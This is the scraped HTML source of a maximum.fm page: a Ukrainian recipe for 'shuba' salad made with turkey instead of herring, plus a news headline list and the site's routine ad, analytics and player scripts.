<a data-url="/pogoda-v-ukrayini-18-veresnya-u-yakih-oblastyah-bude-najholodnishe_n206113" title="" class="ajaxLink" target="_self" href="/pogoda-v-ukrayini-18-veresnya-u-yakih-oblastyah-bude-najholodnishe_n206113">
<div class="time">11:51</div>
<div class="news-title">
Погода в Україні 18 вересня: у яких областях буде найхолодніше
</div>
</a>
</li>
<li class="month">
 17 вересня
</li>
<li data-published-date="2022-09-17 18:27:00" class=" video   ">
<a data-url="/kozak-system--yak-vidgrimit-vijna-divitsya-novij-shchemlivij-klip_n206109" title="" class="ajaxLink" target="_self" href="/kozak-system--yak-vidgrimit-vijna-divitsya-novij-shchemlivij-klip_n206109">
<div class="time">18:27</div>
<div class="news-title">
KOZAK SYSTEM – Як відгримить війна: дивіться новий щемливий кліп
</div>
</a>
</li>
<li data-published-date="2022-09-17 15:53:42" class="   ">
<a data-url="/u-microsoft-nagadali-pro-vidklyuchennya-populyarnoyi-versiyi-windows_n206108" title="" class="ajaxLink" target="_self" href="/u-microsoft-nagadali-pro-vidklyuchennya-populyarnoyi-versiyi-windows_n206108">
<div class="time">15:53</div>
<div class="news-title">
У Microsoft нагадали про відключення популярної версії Windows
</div>
</a>
</li>
<li data-published-date="2022-09-17 12:39:00" class="   ">
<a data-url="/cim-znakam-zodiaku-varto-proyaviti-kreativ-17-veresnya_n206106" title="" class="ajaxLink" target="_self" href="/cim-znakam-zodiaku-varto-proyaviti-kreativ-17-veresnya_n206106">
<div class="time">12:39</div>
<div class="news-title">
Цим знакам Зодіаку варто проявити креатив 17 вересня
</div>
</a>
</li>
<li class="month">
16 вересня
</li>

<li data-published-date="2022-09-16 17:44:00" class="   ">
<a data-url="/vispa-mavp-vzhe-v-ukrayini-simptomi-hvorobi-i-yak-ne-zahvoriti_n206103" title="" class="ajaxLink" target="_self" href="/vispa-mavp-vzhe-v-ukrayini-simptomi-hvorobi-i-yak-ne-zahvoriti_n206103">
<div class="time">17:44</div>
<div class="news-title">
Віспа мавп вже в Україні: симптоми хвороби і як не захворіти
</div>
</a>
</li>
<li data-published-date="2022-09-16 13:41:00" class=" video   ">
<a data-url="/tina-karol--vilni-neskoreni-sluhajte-pershij-trek-spivachki-z-pochatku-vijni_n206099" title="" class="ajaxLink" target="_self" href="/tina-karol--vilni-neskoreni-sluhajte-pershij-trek-spivachki-z-pochatku-vijni_n206099">
<div class="time">13:41</div>
<div class="news-title">
Тіна Кароль – Вільні. Нескорені: слухайте перший трек співачки з початку війни
</div>
</a>
</li>
<li data-published-date="2022-09-16 10:39:00" class="   ">
<a data-url="/45-ukrayinskih-sliv-yaki-harakterizuyut-pogodu_n179450" title="" class="ajaxLink" target="_self" href="/45-ukrayinskih-sliv-yaki-harakterizuyut-pogodu_n179450">
<div class="time">10:39</div>
<div class="news-title">
45 українських слів, які характеризують погоду
</div>
</a>
</li>
<li class="month">
15 вересня
</li>

<li data-published-date="2022-09-15 18:21:00" class=" photo video   ">
<a data-url="/take-vpershe-bryangin-arkush-zaspivali-pro-lito-yakogo-ne-bulo-u-novomu-treku_n206093" title="" class="ajaxLink" target="_self" href="/take-vpershe-bryangin-arkush-zaspivali-pro-lito-yakogo-ne-bulo-u-novomu-treku_n206093">
<div class="time">18:21</div>
<div class="news-title">
Таке вперше: BRYANGIN &amp; ARKUSH заспівали про літо, якого не було, у новому треку
</div>
</a>
</li>
<li data-published-date="2022-09-15 15:26:00" class="   ">
<a data-url="/chomu-dlya-doroslih-tak-shvidko-letit-chas-proste-poyasnennya-naukovciv_n206094" title="" class="ajaxLink" target="_self" href="/chomu-dlya-doroslih-tak-shvidko-letit-chas-proste-poyasnennya-naukovciv_n206094">
<div class="time">15:26</div>
<div class="news-title">
Чому для дорослих так швидко летить час: просте пояснення науковців
</div>
</a>
</li>
<li data-published-date="2022-09-15 12:54:00" class="   ">
<a data-url="/pandemiya-koronavirusu-trivaye-u-vooz-zrobili-nespodivanij-prognoz_n206086" title="" class="ajaxLink" target="_self" href="/pandemiya-koronavirusu-trivaye-u-vooz-zrobili-nespodivanij-prognoz_n206086">
<div class="time">12:54</div>
<div class="news-title">
Пандемія коронавірусу триває: у ВООЗ зробили несподіваний прогноз
</div>
</a>
</li>
<li data-published-date="2022-09-15 10:24:00" class=" photo   ">
<a data-url="/os-vam-a-ne-herson-andrij-danilko-pokazav-znevazhlivij-zhest-okupantam_n206083" title="" class="ajaxLink" target="_self" href="/os-vam-a-ne-herson-andrij-danilko-pokazav-znevazhlivij-zhest-okupantam_n206083">
<div class="time">10:24</div>
<div class="news-title">
&quot;Ось вам, а не Херсон&quot;: Андрій Данилко показав зневажливий жест окупантам
</div>
</a>
</li>
<li class="month">
14 вересня
</li>
<li data-published-date="2022-09-14 20:40:00" class="   ">
<a data-url="/15-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206082" title="" class="ajaxLink" target="_self" href="/15-veresnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti-_n206082">
<div class="time">20:40</div>
<div class="news-title">
15 вересня 2022 – яке сьогодні свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="2022-09-14 18:32:00" class=" video   ">
<a data-url="/bilshe-ne-maks-barskih-spivak-prezentuvav-pershu-pisnyu-pid-novim-psevdonimom_n206081" title="" class="ajaxLink" target="_self" href="/bilshe-ne-maks-barskih-spivak-prezentuvav-pershu-pisnyu-pid-novim-psevdonimom_n206081">
<div class="time">18:32</div>
<div class="news-title">
Більше не Макс Барських: співак презентував першу пісню під новим псевдонімом
</div>
</a>
</li>
<li data-published-date="2022-09-14 15:54:00" class=" photo   ">
<a data-url="/9-vechirnih-zvichok-yaki-naspravdi-psuyut-vash-son_n205210" title="" class="ajaxLink" target="_self" href="/9-vechirnih-zvichok-yaki-naspravdi-psuyut-vash-son_n205210">
<div class="time">15:54</div>
<div class="news-title">
9 вечірніх звичок, які насправді псують ваш сон
</div>
</a>
</li>
<li data-published-date="2022-09-14 12:31:00" class=" photo  last ">
<a data-url="/svyatoslav-vakarchuk-vidmovivsya-vid-golosu-krayini-u-chomu-prichina_n206071" title="" class="ajaxLink" target="_self" href="/svyatoslav-vakarchuk-vidmovivsya-vid-golosu-krayini-u-chomu-prichina_n206071">
<div class="time">12:31</div>
<div class="news-title">
Святослав Вакарчук відмовився від &quot;Голосу країни&quot;: у чому причина
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news top">Більше новин
</button>
</div>
</div>
</div>
<div style="margin: 20px 0" id="recommended">
<script>
    const addPubAdsScript = () => {
        var parentEl = document.getElementsByTagName('body');
        var pubAdsScript = document.createElement('script');
        pubAdsScript.src = "https://securepubads.g.doubleclick.net/tag/js/gpt.js";
        pubAdsScript.async = true;
        parentEl[0].appendChild(pubAdsScript);
    };

    const listener = () => {
        if(window.scrollY > 200) {
            addPubAdsScript();
            window.removeEventListener('scroll', listener);
        }
    }
    window.addEventListener('scroll', listener);
</script>
<script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function () {
        googletag.defineSlot('/56301415/maximum_right_column_more_news', [[1, 1], [300, 250], [300, 600]], 'div-gpt-ad-1640335916932-0').addService(googletag.pubads());
        googletag.pubads().enableSingleRequest();
        googletag.enableServices();
    });
</script>

<div id='div-gpt-ad-1640335916932-0' style='min-width: 300px; min-height: 250px; text-align: center'>
<script>
        googletag.cmd.push(function () {
            googletag.display('div-gpt-ad-1640335916932-0');
        });
    </script>
</div> </div>
</div>
</div>
</div>
<script>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</script>
<div id="mobile-branding">
<div id="mobile-branding-wrapper" style="height: 0">
<div id='div-gpt-ad-1479289268975-0'></div>
</div>
</div>
<script>
    if (window.innerWidth < 640) {
        let headerQuerySelector = 'header';
        // if (document.getElementById('mobileBrandingPlace') === null) {
        //     let mobileBrandingWrapper = document.createElement('div');
        //     mobileBrandingWrapper.id = 'mobileBrandingPlace';
        //     mobileBrandingWrapper.style.zIndex = 9;
        //     document.querySelector(headerQuerySelector).after(mobileBrandingWrapper)
        // }
        window.mobileBrandingConfig = {
            mobileBrandingPlace: '#mobileBrandingPlace',
            headerHeight: 0,
            isHeaderSticky: true,
            headerQuerySelector: headerQuerySelector
        }
        var removeMobileBranding = function () {
            ['mobileBrandingSmall', 'mobileBrandingSmallBannerWrapper'].forEach(item => {
                let branding = document.getElementById(item);
                if (branding && countNews <= 2) {
                    branding.remove();
                }
            });
            const event = document.createEvent('Event');
            event.initEvent('disableSmallMobileBranding', true, true);
            window.dispatchEvent(event);
        }

        initMobileBranding();

        observer('.hide-mobile-adv', removeMobileBranding, 1, false);
    }
</script>
<script>
        let newsText = `&lt;body&gt;&lt;p&gt;Так, оселедець сміливо можна замінити індичкою, і салат засмакує абсолютно по-новому. Це м&#039;ясо досить м&#039;яке і в міру жирне. А ще воно ідеально поєднується з овочами. Оригінальний рецепт з&#039;явився на сторінці ua.zozh в &lt;a rel=&quot;nofollow&quot; href=&quot;https://www.instagram.com/p/CimqtesDj_R/&quot; target=&quot;_blank&quot;&gt;Instagram&lt;/a&gt;.&lt;/p&gt;

&lt;p class=&quot;read-also&quot;&gt;І ще: &lt;a href=&quot;https://maximum.fm/ektor-himenes-bravo-prigotuvav-garyachij-sendvich-recept-perekusu-vid-shef-kuharya_n206091&quot; target=&quot;_blank&quot;&gt;Ектор Хіменес-Браво приготував гарячий сендвіч: рецепт перекусу від шеф-кухаря&lt;/a&gt;&lt;/p&gt;

&lt;h4 style=&quot;text-align: center;&quot;&gt;Як приготувати індичку під шубою: покроковий рецепт&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Інгредієнти:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
	&lt;li&gt;філе індички – 200 грамів;&lt;/li&gt;
	&lt;li&gt;картопля відварена – 2-3 штуки;&lt;/li&gt;
	&lt;li&gt;яйця – 2 штуки;&lt;/li&gt;
	&lt;li&gt;буряк – 2 середніх;&lt;/li&gt;
	&lt;li&gt;морква – 2 середніх;&lt;/li&gt;
	&lt;li&gt;мариновані огірки – 2-3 штуки;&lt;/li&gt;
	&lt;li&gt;чорнослив – 20 грамів (за бажанням);&lt;/li&gt;
	&lt;li&gt;майонез – на ваш смак.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Спосіб приготування:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
	&lt;li&gt;Відваріть картоплю, буряк, моркву та яйця.&lt;/li&gt;
	&lt;li&gt;Тим часом відваріть також або обсмажте індичку.&lt;/li&gt;
	&lt;li&gt;Овочі почистіть та натріть на грубій тертці, а м&#039;ясо поріжте невеликими шматочками&lt;/li&gt;
	&lt;li&gt;Огірок маринований та чорнослив наріжте дрібно.&lt;/li&gt;
	&lt;li&gt;Викладайте салат шарами: картопля – морква – індичка – огірки – яйце – буряк із чорносливом. Між кожним шаром не забудьте змастити майонезом, а зверху – посолити.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Смачного!&lt;/strong&gt;&lt;/p&gt;

&lt;div class=&quot;news-photo&quot;&gt;&lt;img alt=&quot;Альтернативний рецепт &#039;шуби&#039;: що додати до салату замість оселедця - фото 513364&quot; media-alt=&quot;513364&quot; title=&quot;Альтернативний рецепт &#039;шуби&#039;: що додати до салату замість оселедця - 513364&quot; src=&quot;/uploads/media_news/2022/09/6329b21a1937c752112072.jpg?w=640&amp;il&amp;q=60&amp;output=jpg&quot; data-ratio=&quot;1.25&quot; data-width=&quot;750&quot; data-height=&quot;938&quot; data-intrinsic-ratio=&quot;125.06666666667&quot;&gt;&lt;/div&gt;

&lt;p class=&quot;read-also&quot;&gt;Читайте також: &lt;a href=&quot;https://maximum.fm/shcho-prigotuvati-z-garbuza-recept-osinnogo-krem-supu-vid-zirkovogo-kulinara_n206051&quot; target=&quot;_blank&quot;&gt;Що приготувати з гарбуза: рецепт осіннього крем-супу від зіркового кулінара&lt;/a&gt;&lt;/p&gt;&lt;/body&gt;`;
        let pos = newsText.search("fotorama");
        if(pos !== -1){
            var parentEl = document.getElementsByTagName('body');
            var fotoramaJs = document.createElement('script');
            fotoramaJs.src = "/assets/js/fotorama.js?v=53";
            fotoramaJs.setAttribute('data-cfasync', 'false');
            parentEl[0].appendChild(fotoramaJs);
        }
    </script>
<script>
        var ntsVideoHtml = `<div class="nts-video-wrapper">
                                <div class="nts-video-label">Відео дня</div>
                                <div class="nts-video" id="MFM_VIDEO"></div>
                            </div>`;
        var readAlsoBlock = document.querySelector('.read-also').insertAdjacentHTML('afterend', ntsVideoHtml);

        window.notsyCmd = window.notsyCmd || [];
        window.notsyCmd.push(function() {
            window.notsyInit({
                pageVersionAutodetect: true
            });
        });
    </script>
<script>
                (function () {
    var node = document.createElement("p");
    node.setAttribute("id", "withinNewsTextBanner");
    node.innerHTML = "<div id='div-gpt-ad-1586862014522-0'></div><div id='div-gpt-ad-1586862041493-0'></div>";
    var summary = document.querySelector(".news-content");
    summary.insertBefore(node, summary.childNodes[Math.floor(summary.childNodes.length / 2)]);
    var slotId;
    var slotSize;
    var wrapperId;
    var height;

    if (window.innerWidth < 640) {
        slotId = '/56301415/maximum_mobile_300x250_in_news';
        slotSize = [300, 250];
        wrapperId = 'div-gpt-ad-1586862041493-0';
        height = 250;
    } else {
        slotId = '/56301415/maximum_600x300_in_news';
        slotSize = [600, 300];
        wrapperId = 'div-gpt-ad-1586862014522-0';
        height = 350;
    }
    adCore.defineDfpSlot({
        'name': slotId,
        'sizes': slotSize,
        'id': wrapperId,
        'targeting': [],
        'callback': function (e) {
            if(!e.isEmpty) {
                var wrapper = document.getElementById(wrapperId);
                var iFrame = wrapper.getElementsByTagName("iframe")[0];
                if (iFrame) {
                    iFrame.width = '100%';
                    iFrame.height = height;
                }
            }
        }
    });
    var wrapperNode = document.getElementById(wrapperId);
    if (window.innerWidth < 640) {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 250px;')
    } else {
        googletag.cmd.push(function () {
            googletag.display(wrapperId);
        });
        wrapperNode.setAttribute('style', 'width: 100%; height: 350px;')
    }
})();
    </script>
<script>
        
        $(function () {

                        
            getShareCount({
                'newsId': '206143',
                'sharingUrl': 'https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143',
                'whatIs': 'news'
            });

        });

    </script>
<script>
        $(function () {
            new ClipboardTextWatermark({
                selector: '.news-content-wrapper',
                prefixText: 'Новини',
                link: 'https://maximum.fm/novini_t2',
                textWatermark: '<br/>https://maximum.fm/novini_t2'
            });
        });

    </script>
<script>
        function initTwentyTwenty(){
            const images = $('.before-after-comparator').find('img');
            $(images).each(function (){
                this.onload = function (){
                    if (this.height > 0){
                        $(function () {
                            $(".before-after-comparator").each(function (){
                                if(!$(this).hasClass('twentytwenty-container')){
                                    $(this).twentytwenty();
                                }
                            })
                        });
                    }
                }
            })
        }
        // this only for reload page
        window.addEventListener('load', function (e) {
            $(".before-after-comparator").each(function (){
                if(!$(this).hasClass('twentytwenty-container')){
                    $(this).twentytwenty();
                }
            })
        })
        // tis work after ajax replace content
        initTwentyTwenty();
    </script>
<script>
        (function () {
            $('#ontheioViewTacking').attr('data-io-article-url', window.location.href);
        })();
    </script>
<script>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</script>
<script src="/assets/js/replaceViewsCount.js?v=53"></script>
<script>
        window.addEventListener('pageshow', function () {
            new replaceViewsCount.Init({
                newsId: '206143',
                parentClass: '.news-content-wrapper',
                elementClass: '.watchers',
                url: '/get-count-views'
            });
        });
    </script>

<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var onTheIoScript = document.createElement('script');
            onTheIoScript.src = "https://cdn.onthe.io/io.js/Hz0HedbhBSNo"
            parentEl[0].appendChild(onTheIoScript);
        }, 1800);
    </script>
<script>
            window._io_config = window._io_config || {};
            window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
            window._io_config["0.2.0"].push({
                page_url: window.location.href,
                page_url_canonical: "https://maximum.fm/alternativnij-recept-shubi-shcho-dodati-do-salatu-zamist-oseledcya_n206143",
                page_title: "Альтернативний рецепт 'шуби': що додати до салату замість оселедця - Радіо Максимум",
                page_type: "article",
                page_language: "uk",
                article_authors: ["Назар Сорока"],
                article_categories: ["Рецепти"],
                article_type: "Новини",
                article_word_count: "184",
                article_publication_date: "Tue, 20 Sep 2022 16:52:00 +0300"
            });
        </script>

<script src="/assets/js/news.js?v=53"></script>
<script>new news.lazyEmbeds();</script>
</div>
<div class="mobile-320-ad" id="radio24_320x50">
<div id="mobile-320-ad-close">close</div>
<div id='div-gpt-ad-1474010488480-0' style='min-width: 320px; min-height: 50px;'></div>
</div>
<script>
    $('#mobile-320-ad-close').click(function () {
        $('#radio24_320x50').hide();
    });
</script>
<script>
    if( typeof dfpAdSlots === 'undefined'){
        var dfpAdSlots = [];
    }

    lazyLoadScripts(function () {
        if(adCore.isLargerThan(1024)) {
            dfpAdSlots['brandingAdSlot'] = adCore.defineDfpSlot({
                'name': '/56301415/radio24_newBranding',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1465852635468-0',
                'targeting': [
                    ['pageType', adCore.getPageName()],
                                        ['newsId', '206143'],
                    ['tagId', 'Популярне,Рецепти,Їжа,Фото,Новини'],
                                    ],
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if (typeof Foundation != 'undefined') {
                        new Foundation.Equalizer($('#topNewsEqualiser'));
                    }
                    if (e.isEmpty) {
                        if (adCore.isLargerThan(1279)) {
                            $('body').addClass('branding');
                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_left',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534586171-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534586171-0'); });

                            adCore.defineDfpSlot({
                                'name': '/56301415/radio24_160x600_sticky_right',
                                'sizes': [[160, 600], [120, 600]],
                                'id': 'div-gpt-ad-1584534615722-0',
                                'targeting': adCore.targeting.getAll(),
                                'callback': function () {}
                            });
                            googletag.cmd.push(function() { googletag.display('div-gpt-ad-1584534615722-0'); });
                        }
                    } else {
                        dfpAdSlots['brandingAdSlot'] = e.slot;
                    }
                }
            });
        }
    }, 2000);
</script>
<div class="adv-container">
<div class="row">
<div id="branding_wrap" class="bending_wrap"></div>
</div>
</div>
<div id='div-gpt-ad-1465852635468-0'>
<script type='text/javascript'>
        lazyLoadScripts(function () {
            if (adCore.isLargerThan(1024)) {
                googletag.cmd.push(function() { googletag.display('div-gpt-ad-1465852635468-0'); });
            }
        }, 2500);
    </script>
</div>
<div class="adv-container">
<div id="branding-wrapp" class="branding-wrapp">
<div class="google-left-img">
<div id="google-left-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534586171-0'>
</div>
</div>
</div>
<div class="google-right-img">
<div id="google-right-bg-image" style="width: 160px; height: 600px; position: fixed;">

<div id='div-gpt-ad-1584534615722-0'>
</div>
</div>
</div>
</div>
</div>

<script src="/assets/js/lazyLoad.js?v=53"></script>
<script>new lazyLoad.Init();</script>
<script src="/assets/js/application.js?v=53"></script>
<script>
    $('.play-btn').mousedown(function () {
        let playerBtn = $(this);
        if (false === playerBtn.hasClass('play-clicked')) {
            loadPlayer();
            playerBtn.addClass('play-clicked');
        }
    });

    function loadPlayer() {
        application.cssSrc('/assets/css/videojs/videojs.min.css?v=53');
        var player = window.player = videojs('audio-player');
        application.scriptSrc('/assets/js/player.min.js?v=53');
    }
</script>
<script>
    document.addEventListener("DOMContentLoaded", function (){
        const node = document.getElementById('news-list-wrapper');
        if(node){
            const isMainPage = parseInt(node.getAttribute('data-main'));
            if (isMainPage !== 1 ) {
                if (window.innerWidth > 640){
                    application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
                }
            } else {
                application.initTabAndPagination('/get-more-last-news', '/get-more-important-news');
            }
        }
    });
</script>
<footer>
<div class="footer-content">
<div class="row">
<div class="logo-wrapper columns small-12 medium-6">
<a href="/" class="main-logo ajaxLink" data-url="/"></a>
<div class="slogan">Від легендарних до сьогодні! МАКСИМУМ хітів на Радіо МАКСИМУМ</div>
<div class="copyrights">
При цитуванні і використанні будь-яких матеріалів в Інтернеті відкриті для пошукових систем
гіперпосилання не нижче першого абзацу на «Радіо Максимум» — обов’язкові.
Цитування і використання матеріалів у оффлайн-медіа, Мобільних додатках, SmartTV можливе лише з
письмової згоди «Радіо Максимум».
Матеріали з маркуванням «Реклама» публікуються на правах реклами.
Усі права захищені. © 2005—2022, ПрАТ «Телерадіокомпанія “Люкс”», «Радіо Максимум»
</div>
</div>
<div class=" columns small-12 medium-5">
<ul class="social">
<li class="social-button"><a href="//www.facebook.com/maximumfmua" class="facebook" target="_blank"></a></li>
<li class="social-button"><a href="//twitter.com/maximumfm_ua" class="twitter" target="_blank"></a></li>
<li class="social-button"><a href="/rssAll.xml" class="rss" target="_blank"></a></li>
<li class="social-button"><a href="//itunes.apple.com/ua/app/radio-24/id797596046?mt=8" class="appstore" target="_blank"></a></li>
<li class="social-button"><a href="//play.google.com/store/apps/details?id=com.radio24.ua" class="playmarket" target="_blank"></a></li>
</ul>
<ul class="links">
<li title="Архів">
<a class="ajaxLink" data-url="/archive" title="Архів" href="/archive">Архів</a>
</li>
<li>
<a href="/contacts#ownership-structure">Структура власності</a>
</li>
<li title="Контакти">
<a class="ajaxLink" data-url="/contacts" title="Контакти" href="/contacts">Контакти</a>
</li>
<li title="Політика користування сайтом">
<a class="ajaxLink" data-url="/rules" title="Політика користування сайтом" href="/rules">Політика користування сайтом</a>
</li>
<li title="Ведучі">
<a class="ajaxLink" data-url="/staff" title="Ведучі" href="/staff">Ведучі</a>
</li>
<li>
<a href="//maximum.fm/uploads/maximum.m3u">Завантажити для плеєра</a>
</li>
<li title="Карта покриття">
<a class="ajaxLink" data-url="/radiocovermap" title="Карта покриття" href="/radiocovermap">Карта покриття</a>
</li>
<li title="Політика конфіденційності">
<a class="ajaxLink" data-url="/copyrights" title="Політика конфіденційності" href="/copyrights">Політика конфіденційності</a>
</li>
</ul>
</div>
</div>
</div>
</footer>
<script>
    function desktopNewsCatfishInit() {
        if (adCore.isLargerThan(1023)) {
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_desktop_catfish',
                'sizes': [[1, 1], [970, 90]],
                'id': 'div-gpt-ad-1638533775236-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    var marketGrid = document.getElementById('market-grid');
                    if (!e.isEmpty) {
                        marketGrid.style.display = 'flex';

                        if (e.size[0] === 1 && e.size[1] === 1) {
                            let iFrame = marketGrid.getElementsByTagName("iframe")[0];
                            if (iFrame) {
                                iFrame.width = '990';
                                iFrame.height = '182';
                            }
                        }
                    } else {
                        marketGrid.style.display = 'none';
                    }
                }
            });
        }
    }

    desktopNewsCatfishInit();
</script>
<div id="market-grid" style="display: none;" class="market-grid">
<div id='div-gpt-ad-1638533775236-0' style='min-width: 970px; min-height: 90px;'>
<script>
            lazyLoadScripts(function () {
                if (adCore.isLargerThan(1023)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1638533775236-0');
                    });
                }
            }, 1500)
        </script>
</div>
<button class="close close-cat-fish"></button>
</div>
<script>
    $('.close-cat-fish').click(function () {
        $('#market-grid').remove();
    });
</script>
<div class="player-wrapper" style="overflow: hidden; opacity: 0 !important; height: 0; position: absolute; z-index: -1;">
<video id="audio-player" preload="auto" class="video-js vjs-default-skin" playsinline data-setup='{}' controls>
<source src="https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8" type="application/x-mpegURL" />
</video>
</div>
<script>
        lazyLoadScripts(function () {
            $(document).ready(function () {
                $('.expand-stations-wrapper').click(function () {
                    var stations = $('.stations-wrapper-header-block');

                    var isHidden = !stations.hasClass('full-view');
                    if (typeof getCookie("isStationsOpen") !== "undefined") {
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    } else {
                        deleteCookie("isStationsOpen");
                        setCookie("isStationsOpen", isHidden, {'expires': 60 * 60 * 24 * 365, 'path': '/'})
                    }
                });
            });
        }, 2000);

        function deleteCookie(name) {
            setCookie(name, "", {
                expires: -1
            })
        }

        function getCookie(name) {
            var matches = document.cookie.match(new RegExp(
                "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
            ));
            return matches ? decodeURIComponent(matches[1]) : undefined;
        }

        function setCookie(name, value, options) {
            options = options || {};

            var expires = options.expires;

            if (typeof expires === "number" && expires) {
                var d = new Date();
                d.setTime(d.getTime() + expires * 1000);
                expires = options.expires = d;
            }
            if (expires && expires.toUTCString) {
                options.expires = expires.toUTCString();
            }

            value = encodeURIComponent(value);

            var updatedCookie = name + "=" + value;

            for (var propName in options) {
                updatedCookie += "; " + propName;
                var propValue = options[propName];
                if (propValue !== true) {
                    updatedCookie += "=" + propValue;
                }
            }

            document.cookie = updatedCookie;
        }
    </script>
<script>
        lazyLoadScripts(function () {
            (function () {
                if (typeof window.CustomEvent === "function") return false; //If not IE

                function CustomEvent(event, params) {
                    params = params || {bubbles: false, cancelable: false, detail: undefined};
                    var evt = document.createEvent('CustomEvent');
                    evt.initCustomEvent(event, params.bubbles, params.cancelable, params.detail);
                    return evt;
                }

                CustomEvent.prototype = window.Event.prototype;

                window.CustomEvent = CustomEvent;
            })();
        }, 2000);
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var libScript = document.createElement('script');
            libScript.src = "https://imasdk.googleapis.com/js/sdkloader/ima3.js"
            parentEl[0].appendChild(libScript);
        }, 1500);
    </script>
<script src="/assets/js/lib.min.js?v=53"></script>
<script src="/assets/js/news.js?v=53"></script>
<script>
        new news.getMoreNews({
            url: '/get-more-video-news',
            loadBtn: $('.load-more-news'),
        })
    </script>
<script src="/assets/js/app.min.js?v=53"></script>
<script>
    function getAllStream() {
                    var stream = {
                type: 'application/x-mpegURL',
                src: 'https://streamvideo.luxnet.ua/maximum/smil:maximum.stream.smil/playlist.m3u8'
            };
            streamConfig.addStream('onair', stream);
                streamConfig.onAirId = 4;
        streamConfig.onAirName = 'onair';
    }

    function getPrerollLink() {
        player.adTagLink = 'https\u003A\/\/inv\u002Dnets.admixer.net\/daast.aspx\u003Fzone\u003D1ba30f9d\u002Dfe35\u002D415f\u002Da6b5\u002D7077a40865ad\u0026rnd\u003D\u0025\u0025CACHEBUSTER\u0025\u0025\u0026page\u003D\u0025\u0025REFERRER_URL_ESC\u0025\u0025';
    }
</script>
<script src="/assets/js/websocket.js?v=53"></script>
<script>
        new websocket.Init({
            cdnHost: 'https://imagecdn3.luxnet.ua/music/web',
            wsHost: 'wss://maximum.fm/get-station-ws',
            headerSongLimit: 3,
            stationSongListLimit: 15
        });
    </script>
<script type="text/javascript">
        lazyLoadScripts(function () {
            $.smartbanner({
                title: ' ',
                author: 'Безкоштовно',
                inAppStore: 'Встановлюй на iOS', // Text of price for iOS
                inGooglePlay: 'Встановлюй на Android', // Text of price for Android
                price: ' ',
                button: 'Встановити'
            })
        }, 60000);
    </script>
<script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Organization",
        "name": "Радіо Максимум",
        "foundingDate": "2017-10-03",
        "url": "https://maximum.fm/",
        "sameAs": [
            "https://maximum.fm/",
            "https://uk.wikipedia.org/wiki/%D0%A0%D0%B0%D0%B4%D1%96%D0%BE_%D0%9C%D0%B0%D0%BA%D1%81%D0%B8%D0%BC%D1%83%D0%BC",
            "https://www.facebook.com/maximumfmua",
            "https://twitter.com/maximumfm_ua",
            "https://apps.apple.com/ua/app/radio-24/id797596046",
            "https://play.google.com/store/apps/details?id=com.radio24.ua"
        ],
        "logo": {
            "@type": "ImageObject",
            "url": "https://maximum.fm/assets/images/favicons/favicon-64x64.png"
        },
        "address": {
            "@type": "PostalAddress",
            "streetAddress": "Київ, вул. Володимирська 61/11, офіс 44",
            "addressLocality": "Київ",
            "addressCountry": "UA"
        }
    }
</script> <script>
        //Commented. task https://jira.luxnet.ua/browse/MAXIMUM-1960
        // if(window.innerWidth > 640){
        //     $.ajax({
        //         type: "GET",
        //         url: "https://a4p.adpartner.pro/media?site_id=9&unit_id=242",
        //         dataType: "script"
        //     });
        // }
    </script>
<script>
        lazyLoadScripts( function () {
            var parentEl = document.getElementsByTagName('body');
            var gravitecScript = document.createElement('script');
            gravitecScript.src = "https://webvitals.luxnet.ua/js/bundle.js"
            gravitecScript.async
            parentEl[0].appendChild(gravitecScript);
        }, 2500);
    </script>

<div class="toTop">
<div id="toTop">
<img class="toTop-img" src="/assets/images/to_top.png?v=53" style="width: 50px; height: 50px" alt="To top icon">
</div>
</div>
<script>
    $(function() {
        $(window).scroll(function() {
            if($(this).scrollTop() != 0) {
                $('#toTop').fadeIn();
            } else {
                $('#toTop').fadeOut();
            }
        });

        $('#toTop').click(function() {
            $('body,html').animate({scrollTop:0},300);
        });
    });
</script> 
</body>
</html>
